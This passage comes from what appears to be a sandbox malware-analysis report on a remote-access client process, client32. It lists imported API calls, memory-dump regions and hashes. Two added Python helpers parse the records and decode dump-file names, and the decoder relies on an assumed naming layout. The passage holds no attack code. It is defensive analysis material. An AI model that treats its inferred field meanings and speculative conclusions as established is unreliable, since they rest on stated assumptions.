• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
• String ID:
• API String ID: 959338265-0
• Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
• Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
• Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
• Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
• __isleadbyte_l.LIBCMT ref: 111750EC
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
• Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
• Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
• Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91
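The per-function records above are useful mainly in aggregate: which imports each recovered module base reaches, and which build-tree strings (such as the nsmdlg.h path in the String ID field) survive as pivots. The following parser is an added triage helper, not part of the Joe Sandbox report or of NetSupport; it assumes only the layout visible in the listing (a record starts at an "APIs" line, API lines read "• name.MODULE(args) ref: ADDR" optionally prefixed with "Part of subcall function ADDR:", and the "Source File" line carries ", Offset: <hex>"). The embedded sample is a constructed excerpt of the listing's own lines; the first record's API lines fall outside the excerpt, so its API list is empty.

```python
"""Parse Joe Sandbox IDA-plugin function records and summarise them.
Added example; not part of the sandbox report or of NetSupport.
Assumed layout: records begin at an 'APIs' line, API lines look like
'• name.MODULE(args) ref: ADDR' (optionally 'Part of subcall function ADDR:'),
and the 'Source File' line carries ', Offset: <hex>' (module base)."""
import re
from collections import defaultdict

# Constructed excerpt of the listing's own lines (first record's API lines omitted).
SAMPLE = r"""
APIs
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
APIs
• _errno.MSVCR100 ref: 6885EAE7
• _invalid_parameter_noinfo.MSVCR100 ref: 6885EAF2
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000), ref: 6885AF85
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
Similarity
• API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
• String ID:
APIs
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• std::exception::exception.LIBCMT ref: 11035277
• __CxxThrowException@8.LIBCMT ref: 1103528C
• __CxxThrowException@8.LIBCMT ref: 110352B0
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
• __isleadbyte_l.LIBCMT ref: 111750EC
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
"""

# '• [Part of subcall function ADDR: ]name.MODULE[(args)][,] ref: ADDR'
API_RE = re.compile(
    r"^•\s*(?P<subcall>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# Generic '• Key: value' line (key stops at the first colon).
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")


def parse_records(text):
    """Split the listing into records: {'apis': [...], 'fields': {...}, 'base', 'dump'}."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # a new function record starts here
            cur = {"apis": [], "fields": {}, "base": None, "dump": None}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                            # section labels carry no data
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "ref": int(m["ref"], 16),
                                "subcall": m["subcall"] is not None})
            continue
        kv = KV_RE.match(line)
        if not kv:
            continue
        cur["fields"][kv["key"]] = kv["value"]
        if kv["key"] == "Source File":          # dump name, then module base from Offset
            cur["dump"] = kv["value"].split(",")[0].strip()
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", kv["value"])
            cur["base"] = int(off.group(1), 16) if off else None
    return records


def apis_by_module_base(records):
    """Map each module base to the sorted 'MODULE!api' names its functions reach."""
    out = defaultdict(set)
    for r in records:
        for a in r["apis"]:
            out[r["base"]].add(f"{a['module']}!{a['name']}")
    return {base: sorted(names) for base, names in out.items()}


def source_paths(records):
    """Drive-letter paths found in String ID fields (build-tree leftovers, good pivots)."""
    found = set()
    for r in records:
        for s in r["fields"].get("String ID", "").split("$"):
            if re.match(r"^[A-Za-z]:\\", s):
                found.add(s)
    return sorted(found)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, names in sorted(apis_by_module_base(recs).items()):
        print(f"{base:#010x}: {', '.join(names)}")
    print("build paths:", source_paths(recs))
```

Run against the full listing (after stripping the report's leading whitespace), the per-base summary separates the module at 0x11000000 (USER32, KERNEL32 and static CRT calls) from the one at 0x687D0000 (MSVCR100 imports), and `source_paths` pulls the nsmdlg.h build path out of the String ID field without reading every record by hand.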
APIs
• CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A7319
• CreateRectRgn.GDI32(?,?,?,?), ref: 110A737B
• CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7388
• DeleteObject.GDI32(00000000), ref: 110A738F
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateRect$CombineDeleteObject
• String ID:
• API String ID: 1735589438-0
• Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
• Instruction ID: 7c55b913b2b2c5e9ceebf247f0e200ebac5932dc0e21f1d57c3ddac5f96fd2c0
• Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
• Instruction Fuzzy Hash: 6F219236A00119ABCB04DBA9D884CBFB7BAEFC9710711C199FA46D3254E6309D42D7E1
APIs
  • Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,24DE4E77,?,?,?,24DE4E77), ref: 110CCA4A
  • Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,24DE4E77), ref: 110CCAB2
• IsWindow.USER32(?), ref: 110CD2FB
  • Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9
• RemovePropA.USER32(?), ref: 110CD328
• DeleteObject.GDI32(?), ref: 110CD33C
• DeleteObject.GDI32(?), ref: 110CD346
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
• String ID:
• API String ID: 3515130325-0
• Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
• Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
• Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
• Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90
APIs
• FindWindowA.USER32(?,00000000), ref: 1106352E
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FindWindow
• String ID:
• API String ID: 134000473-0
• Opcode ID: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
• Instruction ID: e8329917378a6b87ca437673dd5b043a6dbca1648499038e9eb5cae08ecf1174
• Opcode Fuzzy Hash: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
• Instruction Fuzzy Hash: 5521A675E4122DABD750CF58E885BDEF7F4EB49314F1041E9EA0997281DB30AA44CBD0
APIs
• _mbspbrk.MSVCR100(?,6882CA98,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA03
• _match.LIBCMT ref: 6882CA10
• _calloc_crt.MSVCR100(00000004,00000002,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA44
• free.MSVCR100(?,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA80
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _calloc_crt_match_mbspbrkfree
• String ID:
• API String ID: 518297505-0
• Opcode ID: 30dbefc289dc5bd369eb83f0b020363077feeea8642f3cdb54b46cd447b43c0b
• Instruction ID: 2560498fe3d941a9a69e5a7e74a86e5085256e3b8f810f23382a4a2be2caf5c8
• Opcode Fuzzy Hash: 30dbefc289dc5bd369eb83f0b020363077feeea8642f3cdb54b46cd447b43c0b
• Instruction Fuzzy Hash: 6111E4F6584911CFCB11CF1CCA60429B3E6EB8B7203A54D9AD56AD7652E630DCC1CBC0
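The dump names in the Memory Dump Source entries above encode which process region each disassembly snapshot was taken from. The following parser is an added example, not part of the Joe Sandbox report and not Joe Security's code: it splits the `.sdmp` names listed here and decodes the two columns that match the Windows `PAGE_*` protection and `MEM_*` region-type constants (the constant values are documented Windows facts; the assignment of name fields to meanings, including the PID and module-index columns, is an assumption inferred from the values in this report, and the sixth field is left undecoded). With it, an analyst can confirm that the code the IDA plugin disassembled lives in the single executable `MEM_IMAGE` region at 0x11001000, while the regions at 0x111DD000 and 0x111EC000 are writable data, which is what a "based on PE: true" snapshot should look like.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names as they appear in this report.

Added example; not part of the report and not Joe Security's code.
ASSUMED field layout (inferred from the names in this report, not documented here):
  <pid>.<run>.<dump id>.<base address>.<protection>.<unknown>.<region type>.<module index>.sdmp
The protection and region-type columns match the Windows PAGE_* / MEM_* constants,
which are documented Windows values; the column assignment itself is the assumption.
"""
from dataclasses import dataclass
from typing import List

# Windows memory protection constants (documented values).
PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# Windows region type constants (documented values).
MEM_TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80      # any PAGE_EXECUTE* value
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # any writable / copy-on-write value


@dataclass(frozen=True)
class DumpRegion:
    pid: int            # assumed: first field
    run: str            # assumed: second field, kept verbatim
    dump_id: str        # assumed: third field, kept verbatim
    base: int           # fourth field, hex virtual address
    protection: int     # fifth field, PAGE_* value
    mem_type: int       # seventh field, MEM_* value
    module_index: int   # assumed: eighth field
    name: str

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITE_MASK)


def describe_protection(prot: int) -> str:
    """Render a PAGE_* value such as 0x20 as 'PAGE_EXECUTE_READ', with modifiers appended."""
    base = PAGE_NAMES.get(prot & 0xFF, f"0x{prot & 0xFF:x}")
    mods = [n for bit, n in PAGE_MODIFIERS.items() if prot & bit]
    return "|".join([base] + mods)


def describe_type(mem_type: int) -> str:
    return MEM_TYPE_NAMES.get(mem_type, f"0x{mem_type:x}")


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name into its fields under the assumed layout above."""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(parts)}: {name}")
    pid = int(parts[0], 10)
    base, prot, _unknown, mtype, modidx = (int(p, 16) for p in parts[3:8])
    return DumpRegion(pid, parts[1], parts[2], base, prot, mtype, modidx, name)


def describe_region(r: DumpRegion) -> str:
    return (f"pid {r.pid} 0x{r.base:08X} {describe_protection(r.protection)} "
            f"{describe_type(r.mem_type)} module 0x{r.module_index:02X}")


def executable_regions(names: List[str]) -> List[int]:
    """Base addresses of executable image regions, i.e. where disassembled code can live."""
    regions = [parse_sdmp_name(n) for n in names]
    return sorted(r.base for r in regions if r.executable and r.mem_type == 0x1000000)


# Region names copied from the client32 entries in this report (module index 0x0B).
CLIENT32_DUMPS = [
    "00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp",
    "00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp",
    "00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp",
    "00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp",
    "00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp",
    "00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp",
]

if __name__ == "__main__":
    for n in CLIENT32_DUMPS:
        print(describe_region(parse_sdmp_name(n)))
    print("executable image regions:", [hex(b) for b in executable_regions(CLIENT32_DUMPS)])
```

Run as a script it prints one line per region; the only region that is both executable and `MEM_IMAGE` is 0x11001000, the "Source File" of every client32 function entry above, and the 0x68886000 region of the 0x687D0000 module decodes as `PAGE_WRITECOPY`, consistent with a relocated or patched data page rather than code.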
APIs
• timeGetTime.WINMM ref: 110590FC
• LeaveCriticalSection.KERNEL32(?), ref: 110591AA
• EnterCriticalSection.KERNEL32(?), ref: 110591C4
• LeaveCriticalSection.KERNEL32(?), ref: 110591E9
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$EnterTimetime
• String ID:
• API String ID: 1178526778-0
• Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
• Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
• Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
• Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0
APIs
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
• Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
• Opcode Fuzzy Hash: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
• Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92
APIs
• TlsSetValue.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B1E
• QueryDepthSList.KERNEL32(00000148,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B32
• CloseHandle.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B54
• InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B6C
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
• String ID:
• API String ID: 94243546-0
• Opcode ID: 98dbda9285b1f8cb6f6b7059f9cb2dcb525967ac6857cf1b726b77a45fa7b035
• Instruction ID: 0e1d0f0b5d0d8ffb09a2e1e1952a671de519b16a467e46e7820349be7dcce302
• Opcode Fuzzy Hash: 98dbda9285b1f8cb6f6b7059f9cb2dcb525967ac6857cf1b726b77a45fa7b035
